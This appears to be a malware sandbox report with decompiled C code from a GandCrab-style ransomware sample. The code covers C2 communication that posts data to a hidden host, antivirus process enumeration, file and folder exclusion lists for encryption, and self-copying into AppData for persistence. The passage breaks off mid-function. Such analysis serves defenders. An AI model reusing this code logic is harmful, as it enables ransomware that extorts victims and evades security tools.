Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: ed88c2f5a33f38a727559b5cb77142c21f5b76153891a592ac0699d4e11b0a9b
Instruction ID: 21492cb9e83d2690790ae35305f32c03e332c1293ba406c63d67eb14601adeda
Opcode Fuzzy Hash: ed88c2f5a33f38a727559b5cb77142c21f5b76153891a592ac0699d4e11b0a9b
Instruction Fuzzy Hash: DA517E70648305AFE3109F629C1DB5B7AE8EF49B55F10045CF684AB1C1D7B8A106CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7EF0 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 131
networkfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC7EF0(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				short _v68;
				void* _t38;
				void* _t40;
				long _t54;
				long _t59;
				WCHAR* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t67;

				_t64 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E0FBC7CE0(_t64);
				_t40 = InternetConnectW( *(_t64 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
				_t65 = _t40;
				_v12 = 0;
				_v16 = _t65;
				if(_t65 != 0) {
					_t62 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
					_v20 = _t62;
					wsprintfW(_t62, L"%s", _a8);
					_t63 = HttpOpenRequestW(_t65, _a36, _t62, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t63 != 0) {
						_v68 = 0x6f0048;
						_v64 = 0x740073;
						_v60 = 0x20003a;
						_v56 = 0x6f006e;
						_v52 = 0x6f006d;
						_v48 = 0x650072;
						_v44 = 0x610072;
						_v40 = 0x73006e;
						_v36 = 0x6d006f;
						_v32 = 0x63002e;
						_v28 = 0x69006f;
						_v24 = 0x6e;
						if(HttpAddRequestHeadersW(_t63,  &_v68, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t63, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t67 = _a20;
								_t59 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
									while(1) {
										_t54 = _a4;
										if(_t54 == 0) {
											goto L13;
										}
										 *((char*)(_t54 + _t67)) = 0;
										_a4 = 0;
										_v12 = 1;
										if(InternetReadFile(_t63, _t67, _t59,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t63);
					InternetCloseHandle(_v16);
					VirtualFree(_v20, 0, 0x8000);
					return _v12;
				} else {
					return _t40;
				}
			}

APIs

InternetCloseHandle.WININET(?), ref: 0FBC7F03
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FBC7F22
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,?,0FBC6EE6,ipv4bot.whatismyipaddress.com,0FBCFF10), ref: 0FBC7F4F
wsprintfW.USER32 ref: 0FBC7F63
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 0FBC7F81
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,00000000), ref: 0FBC7FEE
HttpSendRequestW.WININET(00000000,00650072,006F006D,00000000,0000006E), ref: 0FBC8005
InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0FBC8024
InternetReadFile.WININET(00000000,0069006F,0063002D,00000000), ref: 0FBC8050
GetLastError.KERNEL32 ref: 0FBC805C
InternetCloseHandle.WININET(00000000), ref: 0FBC8069
InternetCloseHandle.WININET(00000000), ref: 0FBC806E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC6EE6), ref: 0FBC807A

Strings

o, xrefs: 0FBC7FE0
o, xrefs: 0FBC7FD2
s, xrefs: 0FBC7FA1
n, xrefs: 0FBC7FE7
r, xrefs: 0FBC7FBD
m, xrefs: 0FBC7FB6
n, xrefs: 0FBC7FCB
:, xrefs: 0FBC7FA8
., xrefs: 0FBC7FD9
r, xrefs: 0FBC7FC4
HTTP/1.1, xrefs: 0FBC7F77
H, xrefs: 0FBC7F98
n, xrefs: 0FBC7FAF

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: .$:$H$HTTP/1.1$m$n$n$n$o$o$r$r$s
API String ID: 3906118045-3956618741
Opcode ID: cca287f17b9e58a7532fa9b13e6d5a9db157a353ce37582465b04d5f390263fc
Instruction ID: 76de8b6fe9d869e398e52449dd241a23ecdcf4a385bd9b69696e27ce40c0a88a
Opcode Fuzzy Hash: cca287f17b9e58a7532fa9b13e6d5a9db157a353ce37582465b04d5f390263fc
Instruction Fuzzy Hash: 65417D30A00208ABEB209F52DC49FEFBFBDEF09B65F104059F904A6281C7B599518FE4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7A10 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0FBC7A10(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t49;
				WCHAR* _t56;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c;
					_t49 = CreateToolhelp32Snapshot(2, 0);
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						if(Process32FirstW(_t49) != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
									_t75 = _v24;
									if(Process32NextW(_v20, _t75) != 0 && GetLastError() != 0x12) {
										goto L6;
									}
									goto L17;
								}
								_push(_t77);
								_push( *_t68);
								_v16 = 1;
								if(_a4 != 0) {
									lstrcatW();
									lstrcatW( *_t68, ",");
								} else {
									lstrcpyW();
									lstrcatW( *_t68, ",");
								}
								_a4 =  &(_a4[0]);
								_v12 = _v12 + lstrlenW(_t77) * 2;
								_t79 =  >  ? 1 : _v8;
								_v8 = _t79;
								goto L15;
							}
							L17:
							if(_v16 != 0) {
								_t56 =  *_t68;
								if( *_t56 != 0) {
									 *((short*)( *_t68 + lstrlenW(_t56) * 2 - 2)) = 0;
								}
							}
							 *_a8 = _v12;
						}
						VirtualFree(_t75, 0, 0x8000);
						CloseHandle(_v20);
						_t76 = _v16;
						if(_t76 == 0) {
							VirtualFree( *_t68, _t76, 0x8000);
						}
						return _t76;
					} else {
						VirtualFree(_t75, 0, 0x8000);
						goto L3;
					}
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0FBC7A2D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBC7AA1
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FBC7AB6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC7ACC
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FBC7AEF
lstrcmpiW.KERNEL32(0FBD033C,-00000024), ref: 0FBC7B15
Process32NextW.KERNEL32(?,?), ref: 0FBC7B8E
GetLastError.KERNEL32 ref: 0FBC7B98
lstrlenW.KERNEL32(00000000), ref: 0FBC7BB6
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC7BDB
CloseHandle.KERNEL32(?), ref: 0FBC7BE0
VirtualFree.KERNEL32(?,?,00008000), ref: 0FBC7BF5

Strings

i)w, xrefs: 0FBC7B15

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32lstrcmpilstrlen
String ID: i)w
API String ID: 2470459410-1280834553
Opcode ID: 00609ae607010b940ed90ab1d5db3889638b4994c3af1a85ebe3b2a3ba4c502e
Instruction ID: 44b8093c524016bbada522a31e88d512a8f510cbcd66d5edadffd564a9cd439a
Opcode Fuzzy Hash: 00609ae607010b940ed90ab1d5db3889638b4994c3af1a85ebe3b2a3ba4c502e
Instruction Fuzzy Hash: 4B51AE76A00218ABCB109FA5E859B9E7FB4FF49B65F2040D9F500AB281DB705905CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6790 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBC6790(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0FBC69A3), ref: 0FBC679C
lstrlenW.KERNEL32(00000000), ref: 0FBC67A1
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0FBC67CD
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0FBC67E2
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0FBC67EE
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0FBC67FA
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0FBC6806
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0FBC6812
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0FBC681E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0FBC682A
lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0FBC6836

Strings

ntuser.dat, xrefs: 0FBC67E8
GDCB-DECRYPT.txt, xrefs: 0FBC6830
iconcache.db, xrefs: 0FBC67F4
bootsect.bak, xrefs: 0FBC6800
thumbs.db, xrefs: 0FBC6824
i)w, xrefs: 0FBC67BE
boot.ini, xrefs: 0FBC680C
autorun.inf, xrefs: 0FBC67DC
ntuser.dat.log, xrefs: 0FBC6818
desktop.ini, xrefs: 0FBC67C7

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: i)w$GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3812678309
Opcode ID: 707343b5db58153e00d176e2048f8d13093200625f86f93b67b8d0ff2c3264e1
Instruction ID: d2f33a852ac3b8f99441a448c6671fb81326478ddf8264de971d72b5af022ef0
Opcode Fuzzy Hash: 707343b5db58153e00d176e2048f8d13093200625f86f93b67b8d0ff2c3264e1
Instruction Fuzzy Hash: B511A76270173B255A10276BBC51DFB135FCDC29A074509DEEE04E2853DB45EA134CF6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC54A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0FBC54A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0FBC7CE0( &_v36);
				_v24 = E0FBC5060();
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x77296981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0xfbcfb20]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0xfbcfb30]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0xfbcfb40]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0xfbcfb50]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0xfbcfb60]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0xfbcfb70]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E0FBC9010( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E0FBC53A0( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E0FBC7EF0( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E0FBC5210(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x77296981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}

APIs

Part of subcall function 0FBC7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBC7EC4
Part of subcall function 0FBC7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBC7EDD

Part of subcall function 0FBC5060: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,77296980,00000000,00000000), ref: 0FBC50C6
Part of subcall function 0FBC5060: Sleep.KERNEL32(000003E8), ref: 0FBC5103
Part of subcall function 0FBC5060: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FBC5111
Part of subcall function 0FBC5060: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FBC5121
Part of subcall function 0FBC5060: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FBC513D
Part of subcall function 0FBC5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC514E
Part of subcall function 0FBC5060: wsprintfW.USER32 ref: 0FBC5166
Part of subcall function 0FBC5060: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC5177

lstrlenA.KERNEL32(00000000,77296980,00000000,00000000), ref: 0FBC54C5
VirtualAlloc.KERNEL32(00000000,77296981,00003000,00000040), ref: 0FBC54E5
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FBC54FA
lstrcatA.KERNEL32(00000000,data=), ref: 0FBC5518
lstrcatA.KERNEL32(00000000,0FBC582E), ref: 0FBC551E
lstrlenA.KERNEL32(00000000), ref: 0FBC5572
_memset.LIBCMT ref: 0FBC558D
lstrcpyW.KERNEL32 ref: 0FBC55A1
lstrlenW.KERNEL32(?), ref: 0FBC55B9
lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 0FBC55D9
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 0FBC5636
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0FBC5642
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0FBC564E
InternetCloseHandle.WININET(?), ref: 0FBC5658

Strings

curl.php?token=, xrefs: 0FBC559B
POST, xrefs: 0FBC55CA
data=, xrefs: 0FBC5512

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
String ID: POST$curl.php?token=$data=
API String ID: 186108914-1715678351
Opcode ID: af117265344edf2c7623ab47bd835b4f7e53400b7e94938bf019bd2e7463ca82
Instruction ID: 3eaa4a8867e9d6dd1154f39eb3eaf9f2bc143ef155f27d567a1af8168977f553
Opcode Fuzzy Hash: af117265344edf2c7623ab47bd835b4f7e53400b7e94938bf019bd2e7463ca82
Instruction Fuzzy Hash: 4651B1B5E0030AAADB109BA5EC51BEFBB7DFB88701F104599EA44B3141DB786645CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBC2AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0FBC8090(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0FBC8150( &_v20, lstrlenW( &_v20));
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0FBC8090(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0FBC2890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0FBC2960(_t57, _t75);
					L17:
					ExitThread(0);
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FBC2AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBC2B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0FBC2B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0FBC2B7D

Part of subcall function 0FBC8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC816D
Part of subcall function 0FBC8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBC819B
Part of subcall function 0FBC8150: GetModuleHandleA.KERNEL32(?), ref: 0FBC81EF
Part of subcall function 0FBC8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC81FD
Part of subcall function 0FBC8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC820C
Part of subcall function 0FBC8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC8255
Part of subcall function 0FBC8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC8263

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0FBC2B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0FBC2BE4
lstrcatW.KERNEL32(00000000,?), ref: 0FBC2BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0FBC2BF4
wsprintfW.USER32 ref: 0FBC2C35
ExitThread.KERNEL32 ref: 0FBC2C47

Strings

U, xrefs: 0FBC2B75
.exe, xrefs: 0FBC2BEE
"%s", xrefs: 0FBC2C2F
I, xrefs: 0FBC2B6C
\Microsoft\, xrefs: 0FBC2BDE
AppData, xrefs: 0FBC2B97
P, xrefs: 0FBC2B55

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 5e8559f16c48aa895b884ce6e7ba956b73fa11e5d53b2fbe9050bec991322460
Instruction ID: 05023c658991bef7bf4e18fff1fe13eab8e220fd6c44e794724b8da21613c45d
Opcode Fuzzy Hash: 5e8559f16c48aa895b884ce6e7ba956b73fa11e5d53b2fbe9050bec991322460
Instruction Fuzzy Hash: CC41D5742043049FE300EF21FC59BAB7B99EF88715F0404ACB65597282DAB8D909CFE6

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6640 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0FBC6640(void* __ecx) {
				void* _t10;
				intOrPtr* _t21;
				void* _t45;
				void* _t46;

				_t46 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0FBC8090(_t46, L"\\ProgramData\\") != 0 || E0FBC8090(_t46, L"\\Program Files\\") != 0 || E0FBC8090(_t46, L"\\Tor Browser\\") != 0 || E0FBC8090(_t46, L"Ransomware") != 0 || E0FBC8090(_t46, L"\\All Users\\") != 0 || E0FBC8090(_t46, L"\\Local Settings\\") != 0) {
					L16:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t10 = E0FBC8090(_t46, L":\\Windows\\");
					if(_t10 != 0) {
						goto L16;
					} else {
						_t21 = __imp__SHGetSpecialFolderPathW;
						_push(_t10);
						_push(0x2a);
						_push(_t45);
						_push(_t10);
						if( *_t21() == 0 || E0FBC8090(_t46, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
